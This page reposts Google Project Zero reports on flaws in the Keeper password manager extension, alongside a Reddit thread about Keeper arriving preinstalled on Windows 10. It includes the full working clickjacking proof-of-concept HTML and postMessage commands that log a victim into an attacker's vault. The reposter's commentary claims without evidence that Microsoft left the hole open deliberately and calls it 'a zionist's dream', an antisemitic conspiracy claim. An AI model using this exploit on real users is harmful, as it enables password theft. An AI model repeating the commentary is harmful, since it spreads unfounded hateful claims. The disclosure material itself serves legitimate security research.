- Crapware pre-packaged with Windows 10 allows complete and easy password theft
- A password manager called "keeper" is installed in Windows 10 by default. It allows easy password theft. Microsoft knew this months ago, and kept this vulnerability wide open in the latest update.
- The following was posted to bugs.chromium.org
- keeper: privileged ui injected into pages (again)
- I recently created a fresh Windows 10 VM with a pristine image from MSDN, and found that a password manager called "Keeper" is now installed by default. I'm not the only person who has noticed this:
- https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/
- I assume this is some bundling deal with Microsoft. I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages ( issue 917 ). Amazingly, they're doing the exact same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works.
- Nevertheless, this is (again) a complete compromise of Keeper security, allowing any website to steal any password. Here is a working demo that steals your twitter password:
- https://lock.cmpxchg8b.com/keepertest.html
- Please consider adding regression tests before releasing an update for this issue, as I do not plan on creating new issues for every piece of UI I can dispatch events to, and attackers will certainly check them all.
- This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
- My comment: It could not be any more obvious that Microsoft allowed this intentionally in a way they could push the blame off on someone else. This will allow subversive political groups a way to:
- 1. Get countless false posts in the names of many people in whatever locations they feel are highly strategic politically.
- 2. Give them a doorway into every opponent's life, so they can destroy that opponent and the opponent will never know what hit them. That opponent could be as benign as your grandma when it is made this easy for an attacker.
- 3. Steal whatever they want.
- This kind of security hole is a zionist's dream come true. They can destroy absolutely anyone with it. Not at all surprising it is Microsoft allowing it.
- http://82.221.129.208/.zo4.html
- [News] Keeper Password Manager comes preinstalled now (i.redd.it)
- submitted 6 months ago by ToppestOfDogs
- [–]ToppestOfDogs[S] 7 points 6 months ago
- I just reinstalled Windows 10 today, and I was uninstalling all the bundled apps like usual, and I noticed that Keeper Password Manager is preinstalled now. I've never seen this come installed with Windows before.
- And this isn't a link to install it like some of the other apps, it's actually installed and opens.
- [–]aaronfranke 2 points 6 months ago
- Which edition?
- [–]ToppestOfDogs[S] 5 points 6 months ago
- Pro
- [–]maspiers 2 points 6 months ago
- Had it happen on home too, reimaging a PC last week
- [–]4690 2 points 6 months ago
- Not OP, but I've had it happen in a VM when I installed 10 Pro on it.
- [–]vitorgrs 4 points 6 months ago
- CDM (Content Delivery Manager) does it. It will pre-install some apps based on "your taste".
- [–]MorallyDeplorable 23 points 6 months ago
- That's unsettling.
- [–]ToppestOfDogs[S] 7 points 6 months ago
- Weird. I've never installed any password stuff from the windows store
- [–]luxtabula 3 points 6 months ago
- I've been having computer problems recently and had to reset it. Keeper came preinstalled on the refresh. I highly doubt it was based on my tastes.
- [–]iSn0wElite 3 points 6 months ago
- I think this is true, because I reinstalled windows 10 pro today too and it didn't preinstall any password manager, I had some cooking apps instead 😂
- [–]vitorgrs 5 points 6 months ago
- Here it installs PowerBi and some "Enterprise" stuff lol
- [–]jantari 2 points 6 months ago
- Doubt it, it installed on a brand new laptop that never saw a Microsoft Account only one local admin
- [–]kylegordon 1 point 4 months ago
- A fresh laptop out the box here, wiped and 'reset with no data kept' or whatever it's called, and the app was installed.
- I hadn't put in any email addresses, logged in to any websites, or anything. Only my name for the mandatory user account.
- It's not based on 'taste'
- [–]jbobisaboss 6 points 5 months ago
- Content Delivery Manager. It silently installs apps. You can disable this "feature" with a little registry editing: https://insidewindows.net/2016/08/24/how-to-stop-windows-10-1607-from-installing-unwanted-apps/
- [–]PM_ME_LUCID_DREAMS 3 points 4 months ago
- A bit late, but having reinstalled a "clean" Windows 10 from scratch, this registry edit (SilentInstalledAppsEnabled) was one of the first things I did.
- After an "update", Keeper still appeared, alongside CandyCrush and other shit.
- The registry key itself was not changed by the "update", and I removed the crapware again and it doesn't come back seemingly until the next "update".
- [–]rfarrell1978 1 point 4 months ago
- Thanks for this. Regedit is a part of computers that I was totally ignorant to.
- [–]Jordedude1234 1 point 1 month ago
- Thank you. You have helped a person who google searched it.
- [–]ACM1911 2 points 6 months ago
- I've uninstalled this thing 3 times now. Please go the fuck away Keeper.
- [–]exxxidor 2 points 5 months ago
- Just got this installed today via the WindowsUpdateClient. Ugh.
- Not sure if this is controlled by the Content Delivery System or not. Hope so, as I'm turning that off.
- [–]JamesWildDev 1 point 6 months ago
- I had this too! So weird.
- https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/?st=jbdxsf69&sh=9606f3e9
- Keeper: Trusted UI is injected into untrusted webpage
- Project Member Reported by taviso@google.com, Aug 26 2016
- I took a quick look at Keeper, a password manager for Windows, Mac, Linux. The extension injects its trusted UI into untrusted webpages with a content script. I don't think that's safe to do.
- I'm not a web developer, but you can see what I mean in the attached example. I only tested it in Chrome.
- A more polished example is obviously possible.
- The example does this:
- 1. Click the little keeper icon you add to input boxes, that's just: document.getElementById('keeper-icon-2').click();
- 2. Click the search button in the popup that appears.
- 3. Search for "Google", e.g. document.getElementById('keeper-search-box-input').value="Google"
- 4. Wait for the search results to appear, then hide the iframe.
- 5. When the user is about to click, display it and then wait for the password to be inserted.
- 6. Now the page can read the password.
- This bug is subject to a 90 day disclosure deadline. If 90 days elapse
- without a broadly available patch, then the bug report will automatically
- become visible to the public.
- Comment 1 Deleted
- Project Member Comment 2 by taviso@google.com, Aug 26 2016
- I tried to make the example more reliable.
- Attachment: keeper.html (5.0 KB)
- Comment 3 Deleted
- Project Member Comment 4 by taviso@google.com, Aug 26 2016
- Keeper sent me an updated build that removes the search feature I was using. I suppose that solves the immediate problem. I noticed that the way messages were passed didn't seem safe though.
- For example, it's possible to log someone into your account and then when they save their passwords, they're effectively giving them to you.
- For example a website can do this:
- x = window.open("https://keepersecurity.com/vault/");
- x.postMessage({client: "ext", cmd: "logout"},"*")
- x.postMessage({client: "ext", cmd: "login", login: "attacker@account.com", password: "attackerspassword"}, "*")
- And now whenever you save a password, you're unknowingly saving it to the attackers. I asked why there isn't a check for message.origin == "chrome-extension://...", etc.
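The origin check asked about in Comment 4, as an added example (not code from the report or from Keeper): a `message` handler that exact-matches `event.origin` against an allowlist before acting on `login`/`logout` commands. The extension ID, the function names and the sample events are constructed placeholders.

```javascript
// Added example: origin-checked postMessage handling for a vault page.
// The extension ID below is a constructed placeholder, not a real ID.
const ALLOWED_ORIGINS = new Set([
  "chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
]);
const ALLOWED_COMMANDS = new Set(["login", "logout"]);

// Returns a handler for "message" events that only dispatches commands
// sent from allowlisted origins. `actions` maps command names to functions.
function makeMessageHandler(actions, allowedOrigins = ALLOWED_ORIGINS) {
  return function onMessage(event) {
    // 1. Exact-match the sender's origin. Substring or prefix tests are
    //    not enough, since a look-alike origin can contain the real one.
    if (typeof event.origin !== "string" || !allowedOrigins.has(event.origin)) {
      return { accepted: false, reason: "origin" };
    }
    // 2. Validate the message shape before reading any field from it.
    const msg = event.data;
    if (msg === null || typeof msg !== "object" || msg.client !== "ext") {
      return { accepted: false, reason: "shape" };
    }
    // 3. Dispatch known commands only; the own-property lookup keeps
    //    inherited keys such as "constructor" out of reach.
    if (!ALLOWED_COMMANDS.has(msg.cmd) ||
        !Object.prototype.hasOwnProperty.call(actions, msg.cmd)) {
      return { accepted: false, reason: "command" };
    }
    actions[msg.cmd](msg);
    return { accepted: true, reason: null };
  };
}

// Constructed demo: the same message sent by an untrusted page and by
// the extension. Only the second one reaches the logout action.
function demo() {
  const calls = [];
  const handler = makeMessageHandler({
    login: (m) => calls.push(`login:${m.login}`),
    logout: () => calls.push("logout"),
  });
  const message = { client: "ext", cmd: "logout" };
  const fromPage = handler({ origin: "https://untrusted.example", data: message });
  const fromExtension = handler({
    origin: "chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
    data: message,
  });
  return { fromPage, fromExtension, calls };
}

// In a browser: window.addEventListener("message", makeMessageHandler(actions));
console.log(demo());
```

The wildcard `"*"` in the sender's `postMessage` call only controls who may receive the message; it is the receiving page's check on `event.origin` that decides who may issue commands.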
- Project Member Comment 5 by taviso@google.com, Aug 27 2016
- I uploaded the example here for testing.
- https://lock.cmpxchg8b.com/keeper.html
- Project Member Comment 6 by taviso@google.com, Aug 27 2016
- Labels: -Restrict-View-Commit
- Summary: Keeper: Trusted UI is injected into untrusted webpage (was: Keeper: trusted UI is injected into untrusted webpage)
- It looks like the 10.1.3 update is live on the chrome web store, removing view restriction.
- Comment 7 by cr...@keepersecurity.com, Aug 28 2016
- This issue has been fixed with Keeper Browser Extension v10.1.3 which is live on Chrome web store. Below is the blog post related to the issue:
- https://blog.keepersecurity.com/2016/08/28/security-update-for-keeper-browser-extension/
- Project Member Comment 8 by taviso@google.com, Nov 1 2016
- Status: Fixed
- https://bugs.chromium.org/p/project-zero/issues/detail?id=917
- keeper: privileged ui injected into pages (again)
- Project Member Reported by taviso@google.com, Dec 14 (5 days ago)
- I recently created a fresh Windows 10 VM with a pristine image from MSDN, and found that a password manager called "Keeper" is now installed by default. I'm not the only person who has noticed this:
- https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/
- I assume this is some bundling deal with Microsoft. I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages ( issue 917 ). I checked, and they're doing the same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works.
- Nevertheless, this is a complete compromise of Keeper security, allowing any website to steal any password. Here is a working demo that steals your twitter password:
- https://lock.cmpxchg8b.com/keepertest.html
- Please consider adding regression tests before releasing an update for this issue.
- This bug is subject to a 90 day disclosure deadline. After 90 days elapse
- or a patch has been made broadly available, the bug report will become
- visible to the public.
- Attachment: Windows 7-2017-12-13-16-33-37.png (43.2 KB)
- Project Member Comment 1 by taviso@google.com, Dec 14 (5 days ago)
- Description: Show this description
- Project Member Comment 2 by taviso@google.com, Dec 14 (4 days ago)
- Description: Show this description
- Project Member Comment 3 by taviso@google.com, Dec 14 (4 days ago)
- Keeper replied "we should have a fix built tomorrow and I will let you know when it has been published".
- We discussed possible fixes, it sounds like they're just going to disable the feature for now.
- Project Member Comment 4 by taviso@google.com, Dec 15 (4 days ago)
- Status: Fixed
- Keeper have told me they've released a fixed version.
- Project Member Comment 5 by taviso@google.com, Dec 15 (4 days ago)
- Labels: -Restrict-View-Commit
- Comment 6 by cr...@keepersecurity.com, Dec 15 (3 days ago)
- Version 11.4.4 was released 24 hours after the report. Here's our blog post:
- https://blog.keepersecurity.com/2017/12/15/update-for-keeper-browser-extension-v11-4/
- Project Member Comment 7 by taviso@google.com, Yesterday (43 hours ago)
- Keeper sent me a mail requesting multiple changes to this report, the crux of their concern is that they believe the Keeper browser extension is a separate product to their Keeper desktop application, and believe this report conflates the two products.
- The keeper browser extension is installed as part of the default setup flow for the Keeper application, the relevant prompt can be seen in the attached screenshot. Unless a user clicks "Skip" in this dialog, they would be affected by this vulnerability. I stand by my original assessment of this issue, and consider clicking "Skip" here a non-default configuration.
- A user must have completed the setup flow to be vulnerable - the existence of the keeper icon in the start menu alone is not sufficient. If a user has clicked the icon and started using Keeper in the default configuration, they would be vulnerable.
- Attachment: keeper.jpg (17.5 KB)
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3
- This is the *second* time keeper have been injecting privileged search elements into pages. So yet again, here is how to steal the password for any website from a Keeper user.
- This page just clicks the search button, types in "Twitter" and then adds this page to the list of logon URLs.
- The content below could be invisible, it's low opacity just to demonstrate the attack.
- https://lock.cmpxchg8b.com/keepertest.html
- Issue 917 attachment: keeper.html (5.0 KB)
- <html>
- <head>
- <script>
- const kSearchTerm = "Twitter"; // What password to try to steal.
- const kPollTime = 1000; // How often to check if the Keeper UI is ready.
- var timer;
- var frame;
- // Interact with the UI elements Keeper adds to the page to bring up the search
- // dialog.
- function interact()
- {
- var icon = document.getElementById('keeper-icon-2');
- var search = document.getElementsByClassName("ksec-icon-search")[0];
- var input = document.getElementById('keeper-search-box-input');
- var w = document.getElementById('keeper-injectWindow');
- var create = document.getElementById('keeper-submitYesBtn');
- var log = document.getElementsByClassName('keepersecurity_loginField')[0];
- var pw = document.getElementsByClassName('keepersecurity_tx')[0];
- var save = document.getElementById('save-and-fill-btn');
- // Click the little key icon added to input boxes.
- if (icon)
- icon.click();
- // Sometimes a dialog prompts before the popup is shown, dismiss it.
- if (create && create.offsetParent) {
- create.click();
- return;
- }
- // If it's prompting for a password, fill it in and then reload.
- if (pw && save && pw.offsetParent) {
- pw.value = "__ignore";
- save.click();
- setTimeout("document.location.reload()", kPollTime);
- return;
- }
- // Click the search icon on the top of the popup.
- if (search)
- search.click();
- // Hide the elements created by Keeper.
- if (w)
- w.style.display = "none";
- // Enter the search term "Google", which should add an iframe with results.
- if (input) {
- clearInterval(timer);
- input.value = kSearchTerm;
- input.dispatchEvent(new CustomEvent("keyup", {}))
- timer = setInterval(stealframe, kPollTime);
- }
- }
- function stealframe()
- {
- frame = document.getElementById('keeper-search-result-frame-results');
- target = document.getElementById('target');
- if (frame) {
- clearInterval(timer);
- // We can't access the results, but we can move the iframe around, as
- // soon as it appears, remove it.
- frame.parentElement.removeChild(frame);
- target.style.display = "block";
- // Move the iframe somewhere predictable, but make it transparent so
- // the user doesn't know they're clicking it.
- frame.style.position = "absolute";
- frame.style.width = "256px";
- frame.style.height = "64px";
- frame.style.overflowX = "hidden";
- frame.style.overflowY = "hidden";
- frame.style.overflow = "hidden";
- frame.style.opacity = "0.01";
- //frame.style.top = "-30px"; // First button
- frame.style.top = "-82px"; // Second button
- frame.style.left = "0px";
- target.appendChild(frame);
- }
- }
- </script>
- <style>
- body {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 16px;
- }
- /* Hide all Keeper UI */
- kwdiv {
- opacity: 0.01;
- }
- #target {
- display: none;
- }
- #test {
- opacity: 0.01;
- }
- #target {
- position: relative;
- font-weight: bold;
- }
- #filltitle {
- font-size: 14px;
- padding: 6px 0px;
- position: absolute;
- top: 7px;
- left: 7px;
- }
- /* This is the cssText from the real button */
- #fillbutton {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 14px;
- line-height: 20px;
- color: rgb(0, 0, 238);
- width: 44px;
- padding: 6px 0px;
- height: 20px;
- text-align: center;
- font-weight: bold;
- border: 1px hidden;
- border-radius: 3px;
- cursor: pointer;
- float: right;
- margin-right: 16px;
- position: absolute;
- top: 7px;
- left: 185px;
- text-decoration: underline;
- }
- </style>
- </head>
- <body onload="timer = setInterval(interact, kPollTime)">
- <p>
- This demonstration attempts to automate interacting with the Keeper Chrome
- extension so that the page can steal passwords.
- </p>
- <p>
- This is done by:
- <ul>
- <li>Creating a hidden form that keeper adds a button (<img src="chrome-extension://bfogiafebfohielmmehodmfbbebbbpei/images/16x16gold.png">) to.</li>
- <li>Finding that button, then clicking it with JavaScript.</li>
- <li>Keeper injects a search dialog into the page, which I enter "Twitter" into.</li>
- <li>Waiting for Keeper to draw an iframe with the search results.</li>
- <li>Moving the frame around so you don't know what you're clicking on.</li>
- <li>If you do click it, the password is sent to the untrusted page.</li>
- </ul>
- </p>
- <p>
- The result is that if you click anywhere on a page, you could be sending a
- password for another site.
- </p>
- <div id=target>
- <div id=filltitle>Try clicking this link:</div>
- <div id=fillbutton>Here</div>
- </div>
- <form id=test>
- <input type=text name=username>
- <input type=password name=password onchange="(value != '__ignore') && alert(value)">
- </form>
- </body>
- </html>
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=248504